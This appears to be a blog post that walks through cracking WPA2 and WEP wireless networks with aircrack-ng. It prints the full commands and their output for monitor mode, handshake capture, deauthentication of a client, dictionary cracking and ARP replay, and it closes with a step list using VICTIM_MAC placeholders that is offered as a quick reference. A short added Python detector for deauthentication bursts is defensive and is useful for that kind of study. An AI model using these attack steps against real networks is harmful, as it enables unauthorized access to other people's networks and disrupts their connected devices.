Hacking WPA2 Wireless Networks…
Hey,
I decided to document how to break into a WPA2-enabled wireless network, so I set up my LinkSys WRT54G wireless router over the weekend; here is how I broke into it:
root@bt:~# airmon-ng stop wlan0
Interface Chipset Driver
wlan0 ZyDAS 1211 zd1211rw - [phy1]
(monitor mode disabled)
Start the wireless card in monitor mode:
root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 ZyDAS 1211 zd1211rw - [phy1]
(monitor mode enabled on mon0)
Now we want to run airodump-ng and filter out all the other access points and clients so that we only capture the handshake for our target access point (HackMe):
root@bt:~# airodump-ng --bssid 00:0C:41:9D:C7:5C --channel 6 --write HackMe-Demo mon0
CH 6 ][ Elapsed: 32 s ][ 2010-06-20 19:44 ][ WPA handshake: 00:0C:41:9D:C7:5C
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:0C:41:9D:C7:5C 0 100 316 38 0 6 54 WPA2 CCMP PSK HackMe
BSSID STATION PWR Rate Lost Packets Probes
00:0C:41:9D:C7:5C 00:21:5C:90:2D:89 0 1 - 1 126 456 HackMe
root@bt:~#
Whilst we leave airodump-ng capturing packets and waiting for the WPA handshake, we can speed things up a little using aireplay-ng: we force one of the associated clients to de-authenticate, and it will automatically re-authenticate with the access point, allowing us to capture the WPA handshake:
root@bt:~# aireplay-ng -0 1 -a 00:0C:41:9D:C7:5C -c 00:21:5C:90:2D:89 mon0
19:44:42 Waiting for beacon frame (BSSID: 00:0C:41:9D:C7:5C) on channel 6
19:44:43 Sending 64 directed DeAuth. STMAC: [00:21:5C:90:2D:89] [126|184 ACKs]
root@bt:~# aireplay-ng -0 1 -a 00:0C:41:9D:C7:5C -c 00:21:5C:90:2D:89 mon0
19:44:48 Waiting for beacon frame (BSSID: 00:0C:41:9D:C7:5C) on channel 6
19:44:48 Sending 64 directed DeAuth. STMAC: [00:21:5C:90:2D:89] [ 0|169 ACKs]
root@bt:~# aireplay-ng -0 1 -a 00:0C:41:9D:C7:5C -c 00:21:5C:90:2D:89 mon0
19:44:50 Waiting for beacon frame (BSSID: 00:0C:41:9D:C7:5C) on channel 6
19:44:51 Sending 64 directed DeAuth. STMAC: [00:21:5C:90:2D:89] [185|179 ACKs]
root@bt:~#
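From the defender's side, the forced re-authentication above leaves a very visible trace: a burst of directed deauthentication frames aimed at one station within a fraction of a second. Here is an added example (not code from the original post) of a small Python detector that parses raw 802.11 management frames and flags such bursts; the frame builder and the sample traffic are constructed for the demo, reusing the post's BSSID and client MAC, and the threshold of 10 deauth frames per second is an assumed tuning value.

```python
import struct
from collections import defaultdict
def _mac(b):
    return ':'.join(f'{x:02x}' for x in b)

def parse_deauth(raw):
    """Return addresses and reason code if raw is an 802.11 deauthentication
    frame (type 0, subtype 12), else None. Header is 24 bytes, then reason."""
    if len(raw) < 26:
        return None
    fc, = struct.unpack_from('<H', raw, 0)
    if (fc >> 2) & 0x3 != 0 or (fc >> 4) & 0xF != 12:
        return None
    reason, = struct.unpack_from('<H', raw, 24)
    return {'da': _mac(raw[4:10]), 'sa': _mac(raw[10:16]),
            'bssid': _mac(raw[16:22]), 'reason': reason}

def detect_deauth_bursts(frames, window=1.0, threshold=10):
    """frames: iterable of (timestamp_s, raw_bytes). Returns one alert
    (bssid, station, peak_count, window_start) per (BSSID, target station)
    that received >= threshold deauth frames inside any `window` seconds."""
    seen = defaultdict(list)
    for ts, raw in frames:
        d = parse_deauth(raw)
        if d:
            seen[(d['bssid'], d['da'])].append(ts)
    alerts = []
    for (bssid, sta), times in seen.items():
        times.sort()
        start, peak, peak_ts = 0, 0, None
        for end, t in enumerate(times):          # sliding window over timestamps
            while t - times[start] > window:
                start += 1
            if end - start + 1 > peak:
                peak, peak_ts = end - start + 1, times[start]
        if peak >= threshold:
            alerts.append((bssid, sta, peak, peak_ts))
    return alerts

def build_frame(fc, da, sa, bssid, body=b''):
    """Constructed test frame: frame control, duration, 3 addresses, seq ctrl, body."""
    return struct.pack('<HH', fc, 0) + da + sa + bssid + struct.pack('<H', 0) + body

AP = bytes.fromhex('000C419DC75C')    # the post's BSSID
STA = bytes.fromhex('00215C902D89')   # the post's client
SAMPLE = [(0.0, build_frame(0x0080, AP, AP, AP, b'\x00' * 12)),            # beacon: ignored
          (1.0, build_frame(0x00C0, AP, STA, AP, struct.pack('<H', 3)))]   # one client leaving
# constructed burst: 64 spoofed deauths to the client in under 0.2 s, as aireplay-ng -0 1 sends
SAMPLE += [(5.0 + i * 0.003, build_frame(0x00C0, STA, AP, AP, struct.pack('<H', 7)))
           for i in range(64)]
```

A single deauth from a client that is leaving stays below the threshold, while the 64-frame burst against one station is reported with its peak count and start time.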
Excellent, as you can see we managed to capture the WPA handshake. Let's crack it and recover the WPA passphrase, which we can then use to connect to the wireless network:
CH 6 ][ Elapsed: 32 s ][ 2010-06-20 19:44 ][ WPA handshake: 00:0C:41:9D:C7:5C
root@bt:~# aircrack-ng -a 2 -b 00:0C:41:9D:C7:5C -e HackMe -w password.txt HackMe-Demo-01.cap
Opening HackMe-Demo-01.cap
Reading packets, please wait...
Aircrack-ng 1.1 r1729
[00:00:00] 4 keys tested (67.32 k/s)
KEY FOUND! [ password ]
Master Key : 52 EC 07 C0 95 E6 7B 26 DD 40 59 67 10 7C F6 F7
BE EF E6 66 8D 70 A6 1C 56 BE F5 DD A2 B8 5D 32
Transient Key : 41 3E E2 11 47 CA DA EC 39 FA B8 23 79 4C 01 6A
AC B3 C0 45 FE 62 3F BF 4F 0A A9 B0 63 A1 AC 2E
D4 9C C6 09 C1 A9 82 A8 68 1B 71 BC 65 72 BE 97
C6 A8 2F A9 12 DA 08 C6 73 A5 90 DD E9 EF 5F 66
EAPOL HMAC : CA E1 1F 29 45 9A 1D 5D 1B 25 BF 51 92 1A 95 A9
root@bt:~#
Yay! We got the passphrase, which was “password”.
Hacking WEP Encrypted Wireless Network Notes
Hey, this is just a quick post to outline the steps involved in cracking WEP-protected wireless networks. I will be using the aircrack-ng suite to do this. Follow these steps:
1 ) airmon-ng
Find the network adapter interface to use…
2 ) airmon-ng stop wlan0
Stop the interface.
3 ) ifconfig wlan0 down
Bring the interface down.
4 ) macchanger --mac 00:11:22:33:44:55 wlan0
Bind a fake MAC address to the interface.
5 ) airmon-ng start wlan0
Bring the interface back up in monitor mode.
6 ) airodump-ng wlan0
Take a look to see what networks are available.
Choose the target, grab the essential bits of information: (Victim MAC Address, BSSID, ESSID, Channel).
7 ) airodump-ng -c CHANNEL_NUMBER -w FILENAME --bssid VICTIM_MAC wlan0
Start capturing IVs.
8 ) aireplay-ng -1 0 -a VICTIM_MAC -h 00:11:22:33:44:55 -e VICTIM_ESSID wlan0
Associate with the access point.
9 ) aireplay-ng -3 -b VICTIM_MAC -h 00:11:22:33:44:55 wlan0
Replay ARP packets.
10 ) aircrack-ng -n 64 -b VICTIM_MAC *.cap
Crack the password.
This is a nice quick reference for hacking WEP encrypted wireless networks.